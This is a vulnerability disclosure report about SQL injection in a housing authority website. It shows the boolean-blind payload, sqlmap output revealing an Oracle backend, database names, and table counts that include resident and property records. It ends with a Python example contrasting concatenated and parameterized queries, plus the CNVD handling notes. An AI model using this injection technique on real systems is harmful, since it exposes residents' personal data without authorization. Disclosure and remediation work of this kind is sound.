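2015-12-11: Details reported to the vendor; awaiting vendor handling
2015-12-15: Vendor confirmed; details disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and experts in related fields
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to trainee white hats
2016-01-28: Details disclosed to the public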
Too time-consuming.
http://**.**.**.**/public/ZJJGInfo.aspx?code=176021
and 1=1 returns the page normally; and 1=2 returns no data, so an injection exists.
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=176021 AND 1085=1085
---
[16:10:59] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
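There are 20 databases in total. The housing authority's database does hold a lot of information about residents; I did not track that down, but I did find a large amount of property information.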
[*] apex_030200
[*] appqossys
[*] ctxsys
[*] dbsnmp
[*] exfsys
[*] flows_files
[*] mdsys
[*] olapsys
[*] orddata
[*] ordsys
[*] outln
[*] owbsys
[*] scott
[*] sys
[*] sysman
[*] system
[*] wmsys
[*] wsbalog
[*] wsbayt
[*] xdb
Database: ORDDATA
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| ORDDCM_DICT_ATTRS        | 2418    |
| ORDDCM_STD_ATTRS         | 2415    |
| ORDDCM_UID_DEFS          | 245     |
| ORDDCM_CT_LOCATORPATHS   | 95      |
| ORDDCM_CT_DAREFS         | 72      |
| ORDDCM_CT_PRED           | 61      |
| ORDDCM_CT_PRED_OPRD      | 53      |
| ORDDCM_INTERNAL_TAGS     | 42      |
| ORDDCM_ANON_ATTRS        | 37      |
| ORDDCM_VR_DT_MAP         | 32      |
| ORDDCM_PREFS_LOOKUP      | 13      |
| ORDDCM_RT_PREF_PARAMS    | 13      |
| ORDDCM_CT_PRED_SET       | 9       |
| ORDDCM_DOCS              | 9       |
| ORDDCM_INSTALL_DOCS      | 9       |
| ORDDCM_DOC_TYPES         | 8       |
| ORDDCM_CT_ACTION         | 7       |
| ORDDCM_DOC_REFS          | 7       |
| ORDDCM_ANON_ACTION_TYPES | 4       |
| ORDDCM_ANON_RULE_TYPES   | 3       |
| ORDDCM_ANON_RULES        | 3       |
| ORDDCM_CT_PRED_PAR       | 3       |
| ORDDCM_PRV_ATTRS         | 3       |
| ORDDCM_CT_MACRO_PAR      | 2       |
| ORDDCM_CT_MACRO_DEP      | 1       |
| ORDDCM_DATA_MODEL        | 1       |
| ORDDCM_MAPPING_DOCS      | 1       |
+--------------------------+---------+
A large amount of data:
Database: WSBAYT
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| WSBA_UPLOADFILE         | 375023  | uploaded files
| HPMS_ROOM               | 138098  |
| NWRS_SPFOWNER           | 132130  | commercial housing residents
| LINK_YSSQ_ROOM          | 129938  |
| LINK_ROOM_CERT          | 118348  |
| NWRS_SELLBARGAIN_HTBA   | 82154   |
| LINK_BARGAIN_ROOM       | 75091   |
| LINK_MSG_RECEIVER       | 74353   |
| NWRS_SELLBARGAIN        | 73173   |
| PUBLIC_VISITOR          | 54272   |
| DK_HPMS_ROOM            | 34552   |
| TEST1                   | 32126   |
| TEST2                   | 30187   |
| SFSS_EXCHANGEMES        | 23800   |
| SWRS_CQ_OWNER           | 22963   |
| HPMS_YSSQDOCUMENT       | 21845   |
| SFSS_OBJECTION          | 21768   |
| LINK_YSSQDOC_FILE       | 20688   |
| SWRS_LINK_BARGAIN_ROOM  | 19635   |
| SWRS_SELLBARGAIN_HTBA   | 19629   |
| SWRS_SELLBARGAIN        | 19557   |
| SWRS_CQ_ROOM            | 19429   |
| SWRS_WTBARGAIN          | 19369   |
| SWRS_ISSUE              | 19289   |
| SWRS_CQ_PROPERTY        | 19173   |
| SFSS_JGSQ               | 15486   |
| SFSS_ACCOUNT            | 15383   |
| SFSS_SUPERVISEBARGAIN   | 15383   |
| NWRS_BGSQ               | 14333   |
| SFSS_DEPOSIT            | 12746   |
| WSBA_MESSAGE            | 12590   |
| LINK_BUILD_CERT         | 12200   |
| SFSS_DRAW               | 10685   |
| XTSZ_DAYSERIAL          | 5589    |
| SYS_IMPORT_FULL_01      | 4201    |
| BAK_LINK_ROOM_CERT      | 2802    |
| DK_BUILD_UNIT           | 2228    |
| NWRS_TFSQ               | 1907    |
| SPF_AJBADJSQB           | 1905    |
| HPMS_BUILD              | 1730    |
| BAK_ROOM_VFWID          | 1532    |
| BAK_NWRS_SELLBARGAIN    | 1498    |
| LINK_OLDFWZTSQ_ROOMCODE | 1484    |
| SWRS_TFSQ               | 1468    |
| DK_HTBG_REL             | 1365    |
| HPMS_YSSQ               | 1260    |
| HPMS_YSXKZ              | 1240    |
| SFSS_TOTALACCOUNT       | 1215    |
| LINK_ROOM_CERT_DEL      | 1004    |
| NWRS_SELLBARGAINMB      | 742     |
| LINK_XSRY_PROJECT       | 564     |
| XTSZ_USER               | 554     |
| HPMS_JSGCGHXKZ          | 552     |
| HPMS_JZGCSGXKZ          | 548     |
| HEMS_PERSON             | 536     |
| XTSZ_MKQX               | 514     |
| HPMS_JSYDGHXKZ          | 511     |
| HPMS_TDSYQZ             | 493     |
| XTSZ_CODEB              | 423     |
| HPMS_PROJECT            | 372     |
| SFSS_BGSQ               | 337     |
| SFSS_CXSQ               | 325     |
| HEMS_COMPANY            | 304     |
| XTSZ_MK                 | 251     |
| DK_HEMS_PERSON          | 239     |
| HPMS_OLD_BAZXSQ         | 235     |
| TMP_FWID_OFWID          | 159     |
| HPMS_OLD_LPDR_FW        | 140     |
| DK_BUILD_PROJECTCODEIS0 | 108     |
| HPMS_OLD_LPDR_OFW       | 97      |
| SWRS_LEASEBARGAIN       | 96      |
| HPMS_OLD_LPDR           | 83      |
| HPMS_GCXXJD             | 82      |
| DK_HEMS_COMPANY         | 78      |
| HEMS_QYXXBGSQ           | 74      |
| XTSZ_CBC                | 73      |
| XTSZ_MKFL               | 68      |
| HPMS_BUILDTABLE_CACHE   | 61      |
| HPMS_OLD_ZJZXSQ         | 53      |
| XTSZ_UCCOMPANY          | 52      |
| HPMS_OLD_CFSQ           | 51      |
| NFSS_SPECIALXKZ         | 48      |
| NFSS_SPECIALXKZLOG      | 48      |
| XTSZ_UCPERSON           | 45      |
| NWRS_BOOKBARGAIN        | 35      |
| XTSZ_FORMINFO           | 34      |
| HPMS_OLD_AJZXSQ         | 33      |
| IMP_OLDBUILDS           | 31      |
| XTSZ_FIELDCONFIG        | 31      |
| XTSZ_SYSROLCACHE        | 31      |
| DOFF_ACCOUNTLINKMETHOD  | 29      |
| HPMS_OLD_XZSQ           | 29      |
| HPMS_OLD_CFZXSQ         | 28      |
| HPMS_YSSQZL_TEMPLATE    | 17      |
| HPMS_XMDHXX             | 16      |
| XTSZ_ROLE               | 14      |
| XTSZ_SERIALCONFIG       | 14      |
| NWRS_BARGAIN_TEMPLATE   | 12      |
| XTSZ_COMPANY_NOPUB      | 10      |
| YW_CODEB                | 9       |
| XTSZ_SYSTEM             | 8       |
| HPMS_YSXKZ_DEL          | 7       |
| XTSZ_QUERYCODE          | 7       |
| XTSZ_KEYLOG             | 5       |
| XTSZ_TREECACHE          | 5       |
| XTSZ_UCCONFIGTREEINFO   | 5       |
| XTSZ_YEARSERIAL         | 5       |
| DOFF_ACCOUNT            | 4       |
| LINK_KFQYDLS_LICENCE    | 3       |
| NWRS_SBSUPPLY           | 3       |
| HPMS_YSXKZ_YSJGZH       | 2       |
| LINK_JGSQ_YSJGZH        | 2       |
| NFSS_BANKNET            | 2       |
| NFSS_JGSQ               | 2       |
| SFSS_INTERESTRATE       | 2       |
| XTSZ_ENTERMODULE        | 2       |
| LINK_PROJECT_SPECIALKQY | 1       |
| PUBLIC_BACKINFO         | 1       |
| SWRS_LEASEBARGAINHTBA   | 1       |
| YW_CBC                  | 1       |
+-------------------------+---------+
Database: CTXSYS
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| DR$OBJECT_ATTRIBUTE     | 512     |
| DR$DBO                  | 362     |
| DR$NUMBER_SEQUENCE      | 256     |
| DR$OBJECT_ATTRIBUTE_LOV | 168     |
| DR$INDEX_VALUE          | 86      |
| DR$STOPWORD             | 76      |
| DR$OBJECT               | 53      |
| DR$INDEX_OBJECT         | 36      |
| DR$PARAMETER            | 33      |
| DR$PREFERENCE           | 30      |
| DR$PREFERENCE_VALUE     | 20      |
| DR$FEATURE_USED         | 17      |
| DR$CLASS                | 13      |
| DR$SECTION_GROUP        | 5       |
| DR$INDEX                | 4       |
| DR$STOPLIST             | 3       |
| DR$INDEX_SET            | 1       |
+-------------------------+---------+
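This site has quite a few injection points; I recommend testing thoroughly offline and then replacing it with a new system.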
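Added example, not part of the original report and not the site's code: a Python/sqlite3 stand-in for the code lookup, showing why the and 1=1 / and 1=2 pair behaves as reported when the parameter is concatenated into the query, and how an integer check plus a bind variable removes that behaviour. The table name zjjg_info, the sample row and the function names are assumptions; the real application runs ASP.NET on Oracle.

```python
import sqlite3


def make_db():
    # Constructed sample data; the table name is hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE zjjg_info (code INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO zjjg_info VALUES (176021, 'sample record')")
    return db


def lookup_concatenated(db, code):
    # Vulnerable pattern: the raw parameter is pasted into the SQL text,
    # so anything after the number becomes part of the WHERE clause.
    sql = "SELECT name FROM zjjg_info WHERE code = " + code
    return db.execute(sql).fetchall()


def lookup_bound(db, code):
    # Hardened pattern: accept only a short decimal number, then pass it
    # as a bind value so it can never be parsed as SQL.
    if not (code.isascii() and code.isdigit() and len(code) <= 10):
        raise ValueError("code must be a short decimal number")
    sql = "SELECT name FROM zjjg_info WHERE code = ?"
    return db.execute(sql, (int(code),)).fetchall()


def compare(db):
    # Row counts per input: (concatenated query, bound query).
    results = {}
    for value in ("176021", "176021 and 1=1", "176021 and 1=2"):
        old = len(lookup_concatenated(db, value))
        try:
            new = len(lookup_bound(db, value))
        except ValueError:
            new = "rejected"
        results[value] = (old, new)
    return results


if __name__ == "__main__":
    for value, (old, new) in compare(make_db()).items():
        print(f"{value!r}: concatenated rows={old}, bound={new}")
```

With the concatenated query the row count follows the appended condition, which is the true/false signal the report describes; with the bound query both test strings are rejected before reaching the database.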
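Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-15 15:00
CNVD confirmed and reproduced the reported vulnerability and has forwarded it through CNCERT to the Henan branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet.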